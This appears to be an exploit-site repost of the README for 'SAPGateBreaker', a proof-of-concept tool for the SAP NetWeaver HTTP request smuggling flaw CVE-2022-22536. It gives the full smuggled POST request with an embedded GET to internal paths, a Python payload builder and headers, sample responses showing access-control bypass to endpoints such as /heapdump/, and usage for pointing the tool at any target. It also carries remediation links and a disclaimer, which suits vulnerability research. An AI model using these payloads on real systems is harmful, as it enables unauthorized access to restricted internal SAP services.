Exploit for HTTP Request Smuggling in Sap Content Server CVE-2022-22536

## https://sploitus.com/exploit?id=83A12F28-C891-50A2-9B0F-72883CD400A4
# CVE-2022-22536: HTTP Smuggling Through SAP's Front Door
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.

# SAPGateBreaker-Exploit
SAPGateBreaker is a PoC exploit for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver. It demonstrates how to bypass ACLs by desynchronizing request parsing between ICM and backend services using crafted Content-Length-based payloads.

![Image](https://github.com/user-attachments/assets/21ad047f-ab0d-4080-88a2-3e863a4b1d68)
![Image](https://github.com/user-attachments/assets/6ddc53aa-346b-4b2d-9e4e-25072866cb11)

The vulnerability identified as CVE-2022-22536 represents a critical flaw in SAP NetWeaver Application Server, exposing installations to HTTP Request Smuggling attacks. This vulnerability, with a CVSS score of 9.8, affects both Java and ABAP stacks, allowing attackers to bypass access control mechanisms and interact with internal applications as though they were on the internal network.

**Understanding HTTP Request Smuggling**

HTTP Request Smuggling (HRS) is an advanced technique that exploits discrepancies in how different components of a web infrastructure (typically proxies, load balancers, and backend servers) interpret the boundaries between HTTP requests. By manipulating headers like `Content-Length` and `Transfer-Encoding`, an attacker can "smuggle" a malicious request that is desynchronized from what the backend server expects.

In essence, when a front-end and a back-end server disagree on where one request ends and the next begins, an attacker can inject a second, hidden request that will be processed with elevated trust. This often results in security bypasses such as WAF evasion, cache poisoning, or ACL circumvention.

**The Nature of CVE-2022-22536**

SAP’s ICM (Internet Communication Manager) improperly parses crafted HTTP requests, enabling a smuggled request to reach internal services. This is particularly impactful in segmented architectures, where direct access to internal services is restricted. Exploiting this vulnerability allows attackers to issue requests that appear to originate from the trusted internal network.

The vulnerability manifests when a payload abuses conflicting interpretations of the end of an HTTP request. This commonly involves injecting a `Transfer-Encoding: chunked` header or manipulating the `Content-Length` field to cause the desynchronization.

**Initial Payload Failures and Chunked Encoding Rejection**

During testing, payloads leveraging canonical chunked smuggling techniques led to `408 Request Timeout` responses from SAP ICM. This behavior indicated that SAP's HTTP stack does not support `Transfer-Encoding: chunked` in the expected manner, preventing traditional chunked-based desynchronization.

As a result, the exploit methodology shifted to using `Content-Length` headers for desynchronization. A crafted request with an empty chunked payload followed by a valid secondary HTTP request successfully bypassed request boundaries. This alternate strategy proved effective in bypassing internal access controls.

**Final Exploit Strategy and Code Implementation**

The working exploit sends a POST request to a public endpoint (`/sap/admin/public/default.html`) with a `Content-Length` header, followed by an embedded GET request that is intended to reach an internal resource.

```http
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
Authorization: Basic YTph
Cookie: saplb_*=(J2EE7364720)7364750
Content-Type: application/json
Content-Length: 128

0

GET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Connection: close
```

This results in a successful internal access:

```http
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
Content-Length: 4465
Content-Type: text/html
Connection: Keep-Alive
```

The implementation iterates through a list of internal SAP URLs that are normally restricted. A comparison is made between the status code received via direct access and the one received when accessed through the smuggled request. If the internal access returns 200 (while direct access returns 403 or 404), it indicates that the smuggling technique successfully bypassed internal access controls.

The logic for building the payload:

```python
def build_smuggled_request(path):
    return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
```

The attack is executed using a crafted POST request containing the smuggled payload:

```python
headers = {
    "Host": f"{host}:{port}",
    "Authorization": "Basic YTph",
    "Cookie": "saplb_*=(J2EE7364720)7364750",
    "Content-Type": "application/json",
    "Content-Length": str(len(body.encode("utf-8")))
}
```

**Observed Results**

In multiple test cases, endpoints such as `/sap/public/bc/icf/info` or `/heapdump/`, which normally returned `403 Forbidden` or `404 Not Found`, responded with `200 OK` when accessed through the smuggled request. This demonstrates a successful circumvention of SAP’s access controls.

The tool’s output included both sent payloads and response headers, enabling precise forensic validation:

```
>>> Sent Payload:
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
...

>>> Received Response:
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
...
```
Normal Request:

![Image](https://github.com/user-attachments/assets/b28eacb9-e447-4c7e-a468-14fcbff40e1f)

![Image](https://github.com/user-attachments/assets/ac2c80f2-aa8a-4634-87f3-1dd14e90c6a2)

Exploit Request:

![Image](https://github.com/user-attachments/assets/b346b508-2ca1-4091-98f1-9e80a02eb27b)

![Image](https://github.com/user-attachments/assets/cae32023-d9bf-4cbb-ba96-3855e8e2d63c)

**Conclusion**

CVE-2022-22536 highlights the persistent threat posed by HTTP Request Smuggling in modern enterprise software stacks. The presented proof-of-concept is a demonstration of the underlying vulnerability and serves as a tool for validation and defense testing.

Administrators are strongly advised to apply SAP security updates and implement appropriate reverse proxy protections to prevent malformed HTTP request propagation.

More details on CVE-2022-22536 can be found at:
https://nvd.nist.gov/vuln/detail/CVE-2022-22536

SAP Security Note:
https://launchpad.support.sap.com/#/notes/3123396

**SAPGateBreaker Exploit**

SAPGateBreaker is a standalone Python tool that automates testing for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server.

---

**Usage**

```bash
python3 sapgatebreaker.py -u http://<target-host>:<port> [--verbose]
```

**Arguments:**

- `-u`, `--url`: Target URL (e.g., `http://172.32.22.7:50000`)
- `-v`, `--verbose`: Enables detailed header and body output for each request and response

**Features:**

- Detects SAP NetWeaver version via HTTP header inspection
- Builds desynchronized HTTP request payloads for internal access testing
- Compares direct vs. smuggled responses to identify bypasses
- Logs all data to `poc.txt` for further analysis

**Remediation:**
https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation/ba-p/13528083

**Disclaimer**

This tool is intended for educational and authorized penetration testing only. Unauthorized use against systems without explicit permission is strictly prohibited and may violate applicable laws.